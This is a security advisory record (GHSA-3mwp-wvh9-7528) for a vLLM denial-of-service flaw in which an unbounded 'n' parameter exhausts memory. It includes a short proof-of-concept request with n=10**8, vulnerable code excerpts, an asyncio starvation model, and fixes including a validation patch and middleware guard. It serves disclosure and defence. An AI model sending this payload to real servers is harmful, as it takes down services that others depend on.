GHSA-3mwp-wvh9-7528

Source
https://github.com/advisories/GHSA-3mwp-wvh9-7528
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-3mwp-wvh9-7528/GHSA-3mwp-wvh9-7528.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-3mwp-wvh9-7528
Aliases
  • CVE-2026-34756
Published
2026-04-03T15:35:48Z
Modified
2026-04-03T15:50:59.028452Z
Severity
  • 6.5 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
Summary
vLLM: Unauthenticated OOM Denial of Service via Unbounded `n` Parameter in OpenAI API Server
Details

Summary

A Denial of Service vulnerability exists in the vLLM OpenAI-compatible API server. Because the n parameter in the ChatCompletionRequest and CompletionRequest Pydantic models has no upper-bound validation, an unauthenticated attacker can send a single HTTP request with an enormous n value. Processing that request blocks the Python asyncio event loop and causes an immediate Out-Of-Memory crash, as millions of request object copies are allocated on the heap before the request ever reaches the scheduling queue.
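
For illustration, the attack is an ordinary chat-completion call with an oversized n. The sketch below uses only the Python standard library; the host, model name, and n value are placeholders, not values taken from the advisory:

    import json
    import urllib.request

    # Hypothetical target: any unpatched vLLM OpenAI-compatible endpoint.
    payload = {
        "model": "placeholder-model",
        "messages": [{"role": "user", "content": "hi"}],
        "n": 10**8,  # no upper bound is enforced, so this value is accepted
    }
    req = urllib.request.Request(
        "http://vllm-host:8000/v1/chat/completions",
        data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json"},
    )
    # On affected versions (< 0.19.0), this single request is enough to
    # stall the event loop and drive the process toward an OOM kill.
    urllib.request.urlopen(req)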

Details

The root cause of this vulnerability lies in missing upper-bound checks across the request parsing and asynchronous scheduling layers:

  1. Protocol Layer: In vllm/entrypoints/openai/chat_completion/protocol.py, the n parameter is defined as a plain integer, with no pydantic.Field constraint enforcing an upper bound (one possible fix is sketched after this list).

    class ChatCompletionRequest(OpenAIBaseModel):
        # Ordered by official OpenAI API documentation
        # https://platform.openai.com/docs/api-reference/chat/create
        messages: list[ChatCompletionMessageParam]
        model: str | None = None
        frequency_penalty: float | None = 0.0
        logit_bias: dict[str, float] | None = None
        logprobs: bool | None = False
        top_logprobs: int | None = 0
        max_tokens: int | None = Field(
            default=None,
            deprecated="max_tokens is deprecated in favor of "
            "the max_completion_tokens field",
        )
        max_completion_tokens: int | None = None
        n: int | None = 1
        presence_penalty: float | None = 0.0
    
  2. SamplingParams Layer (Incomplete Validation): When the API request is converted to internal SamplingParams in vllm/sampling_params.py, the _verify_args method only checks the lower bound (self.n < 1); an upper-bound check is missing entirely (the sketch after this list covers this layer as well).

        def _verify_args(self) -> None:
            if not isinstance(self.n, int):
                raise ValueError(f"n must be an int, but is of type {type(self.n)}")
            if self.n < 1:
                raise ValueError(f"n must be at least 1, got {self.n}.")
    
  3. Engine Layer (The OOM Trigger): When the malicious request reaches the core engine (vllm/v1/engine/async_llm.py), the engine fans the request out n times inside a synchronous loop, creating an independent child request for each of the n requested sequences.

            # Fan out child requests (for n>1).
            parent_request = ParentRequest(request)
            for idx in range(parent_params.n):
                request_id, child_params = parent_request.get_child_info(idx)
                child_request = request if idx == parent_params.n - 1 else copy(request)
                child_request.request_id = request_id
                child_request.sampling_params = child_params
                await self._add_request(
                    child_request, prompt_text, parent_request, idx, queue
                )
            return queue
    

    Because Python's asyncio runs on a single thread and event loop, this monolithic for-loop monopolizes the CPU thread. The server stops responding to all other connections (including liveness probes). Simultaneously, the memory allocator is overwhelmed by cloning millions of request object instances via copy(request), driving the host's Resident Set Size (RSS) up by gigabytes per second until the OS OOM-killer terminates the vLLM process.
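
The starvation effect can be modeled outside vLLM with a few lines of asyncio. The sketch below is a standalone illustration, not vLLM code: a heartbeat task (standing in for a liveness probe) stops being serviced while a synchronous fan-out loop holds the event loop:

    import asyncio
    import time
    from copy import copy

    class Request:
        def __init__(self):
            self.payload = bytes(1024)  # stand-in for per-request state

    async def heartbeat():
        # Models a liveness probe that should tick every 100 ms.
        while True:
            print(f"heartbeat at {time.monotonic():.2f}")
            await asyncio.sleep(0.1)

    async def fan_out(n: int):
        # Models the engine-layer loop: there is no await between
        # iterations, so no other task can run until it finishes, and
        # every iteration allocates another shallow copy on the heap.
        # At attacker-chosen scale, this pattern drives RSS up until
        # the OS OOM-killer fires.
        request = Request()
        return [copy(request) for _ in range(n)]

    async def main():
        probe = asyncio.create_task(heartbeat())
        await asyncio.sleep(0.3)   # heartbeat ticks normally
        await fan_out(2_000_000)   # heartbeat goes silent; memory climbs
        probe.cancel()

    asyncio.run(main())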
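
Closing the gap in layers 1 and 2 amounts to bounding n both at parse time and at verification time. The sketch below is illustrative only; the MAX_N cap of 128 is an assumption, not the limit adopted in the fixed release:

    from pydantic import BaseModel, Field

    MAX_N = 128  # assumed cap for illustration

    class ChatCompletionRequest(BaseModel):
        # ge/le make pydantic reject out-of-range values at parse time,
        # before any fan-out work happens.
        n: int | None = Field(default=1, ge=1, le=MAX_N)

    class SamplingParams:
        def __init__(self, n: int = 1):
            self.n = n
            self._verify_args()

        def _verify_args(self) -> None:
            if not isinstance(self.n, int):
                raise ValueError(f"n must be an int, but is of type {type(self.n)}")
            if self.n < 1:
                raise ValueError(f"n must be at least 1, got {self.n}.")
            # The missing check: bound n from above as well.
            if self.n > MAX_N:
                raise ValueError(f"n must be at most {MAX_N}, got {self.n}.")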

Impact

Vulnerability Type: Resource Exhaustion / Denial of Service

Impacted Parties:

  • Any individual or organization hosting a public-facing vLLM API server (vllm.entrypoints.openai.api_server), the primary entrypoint for OpenAI-compatible deployments.
  • SaaS / AI-as-a-Service platforms whose reverse proxies sit in front of vLLM without strict HTTP body validation or rate limiting.

Because this vulnerability exploits the control plane rather than the data plane, an unauthenticated remote attacker can reliably take down production inference hosts with a single HTTP request, bypassing hardware-level capacity planning and conventional bandwidth-based rate limits.
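
Pending an upgrade, a proxy- or middleware-level guard can reject oversized n values before they reach vLLM. The sketch below is a hypothetical ASGI filter; the class name, path prefix, and cap are assumptions, not advisory content:

    import json

    MAX_N = 8  # assumed proxy-side cap; tune to the deployment

    class BoundNMiddleware:
        # Buffers the request body, rejects requests whose "n" exceeds
        # MAX_N, and replays the body to the wrapped app otherwise.
        def __init__(self, app):
            self.app = app

        async def __call__(self, scope, receive, send):
            if scope["type"] != "http" or not scope["path"].startswith("/v1/"):
                return await self.app(scope, receive, send)

            body = b""
            while True:
                message = await receive()
                body += message.get("body", b"")
                if not message.get("more_body"):
                    break

            try:
                n = json.loads(body or b"{}").get("n", 1)
            except (json.JSONDecodeError, AttributeError):
                n = 1
            if isinstance(n, int) and n > MAX_N:
                await send({"type": "http.response.start", "status": 400,
                            "headers": [(b"content-type", b"application/json")]})
                await send({"type": "http.response.body",
                            "body": b'{"error": "n exceeds allowed maximum"}'})
                return

            async def replay():
                return {"type": "http.request", "body": body, "more_body": False}

            await self.app(scope, replay, send)

A guard like this complements, rather than replaces, upgrading to a fixed release.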

Database specific
{
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-03T15:35:48Z",
    "severity": "MODERATE",
    "nvd_published_at": null,
    "cwe_ids": [
        "CWE-770"
    ]
}
References

Affected packages

PyPI / vllm

Affected ranges

  • Type: ECOSYSTEM
  • Introduced: 0.1.0
  • Fixed: 0.19.0

Affected versions

0.1.0
0.1.1
0.1.2
0.1.3
0.1.4
0.1.5
0.1.6
0.1.7
0.2.0
0.2.1
0.2.1.post1
0.2.2
0.2.3
0.2.4
0.2.5
0.2.6
0.2.7
0.3.0
0.3.1
0.3.2
0.3.3
0.4.0
0.4.0.post1
0.4.1
0.4.2
0.4.3
0.5.0
0.5.0.post1
0.5.1
0.5.2
0.5.3
0.5.3.post1
0.5.4
0.5.5
0.6.0
0.6.1
0.6.1.post1
0.6.1.post2
0.6.2
0.6.3
0.6.3.post1
0.6.4
0.6.4.post1
0.6.5
0.6.6
0.6.6.post1
0.7.0
0.7.1
0.7.2
0.7.3
0.8.0
0.8.1
0.8.2
0.8.3
0.8.4
0.8.5
0.8.5.post1
0.9.0
0.9.0.1
0.9.1
0.9.2
0.10.0
0.10.1
0.10.1.1
0.10.2
0.11.0
0.11.1
0.11.2
0.12.0
0.13.0
0.14.0
0.14.1
0.15.0
0.15.1
0.16.0
0.17.0
0.17.1
0.18.0
0.18.1

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-3mwp-wvh9-7528/GHSA-3mwp-wvh9-7528.json"